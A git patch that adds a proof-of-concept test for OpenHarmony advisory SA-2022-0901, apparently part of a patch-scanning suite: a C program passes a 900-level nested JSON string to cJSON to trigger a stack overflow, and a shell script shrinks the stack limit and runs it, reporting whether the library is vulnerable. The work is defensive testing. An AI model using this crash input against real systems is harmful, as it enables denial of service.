From 7331954897b4ba4fa88062595ac586425554f1a5 Mon Sep 17 00:00:00 2001 From: jingyu123412 <1565704822@qq.com> Date: Thu, 2 Mar 2023 09:52:14 +0800 Subject: [PATCH] =?UTF-8?q?=E6=8F=90=E4=BA=A4OpenHarmony-SA-2022-0901?= =?UTF-8?q?=E5=8A=A8=E6=80=81=E6=B5=8B=E8=AF=95=E7=94=A8=E4=BE=8B?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: jingyu123412 <1565704822@qq.com> --- .../2022-09/OpenHarmony-SA-2022-0901/poc.c | 38 +++++++++++++++++++ .../2022-09/OpenHarmony-SA-2022-0901/poc.sh | 26 +++++++++++++ 2 files changed, 64 insertions(+) create mode 100644 demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c create mode 100644 demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c new file mode 100644 index 000000000..442138216 --- /dev/null +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c @@ -0,0 +1,38 @@ +/* + * Copyright (c) 2023 Huawei Device Co., Ltd. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +// 编译时需要使用-l参数链接cjson共享库 +#include +#include + +int main() +{ + + // 准备一个具有900层嵌套结构的json数据 + char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"; + + cJSON *root = cJSON_Parse(json_string); // cJSON_Parse方法解析json数据 + if (root == NULL) + { + // 解析json数据返回值为null,说明设置了最大嵌套层数,修复了漏洞 + printf("OpenHarmony-SA-2022-0901 : not vulnerable\n"); + return 1; + } + // 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示 + printf("OpenHarmony-SA-2022-0901 : vulnerable\n"); + cJSON_Delete(root); + + return 0; +} diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh new file mode 100644 index 000000000..a2b1eff38 --- /dev/null +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh @@ -0,0 +1,26 @@ +#!/bin/bash +# Copyright (C) 2023 Huawei Device Co., Ltd. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + + +#//OpenHarmony标准系统中cJSON库解析900层的嵌套json数据大概会占用60KB栈空间 +#修改栈的存储上限,模拟栈资源紧缺的情况,便于触发栈溢出 +#或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间 +ulimit -s 60 + +#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置 +export LD_LIBRARY_PATH=/data/local/tmp + +#运行poc可执行程序 +./poc -- GitLab